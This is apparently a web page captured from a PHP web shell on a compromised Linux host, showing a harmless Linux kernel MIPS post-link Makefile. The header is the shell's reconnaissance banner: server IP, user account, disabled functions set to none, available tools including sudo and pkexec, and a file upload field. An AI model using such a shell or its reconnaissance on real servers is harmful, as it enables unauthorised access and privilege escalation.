Server IP : 184.154.167.98 / Your IP : 3.15.188.84 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/src/kernels/4.18.0-553.22.1.lve.1.el8.x86_64/arch/mips/ |
Upload File : |
# SPDX-License-Identifier: GPL-2.0 # =========================================================================== # Post-link MIPS pass # =========================================================================== # # 1. Insert relocations into vmlinux PHONY := __archpost __archpost: -include include/config/auto.conf include scripts/Kbuild.include CMD_RELOCS = arch/mips/boot/tools/relocs quiet_cmd_relocs = RELOCS $@ cmd_relocs = $(CMD_RELOCS) $@ # `@true` prevents complaint when there is nothing to be done vmlinux: FORCE @true ifeq ($(CONFIG_RELOCATABLE),y) $(call if_changed,relocs) endif %.ko: FORCE @true clean: @true PHONY += FORCE clean FORCE: .PHONY: $(PHONY)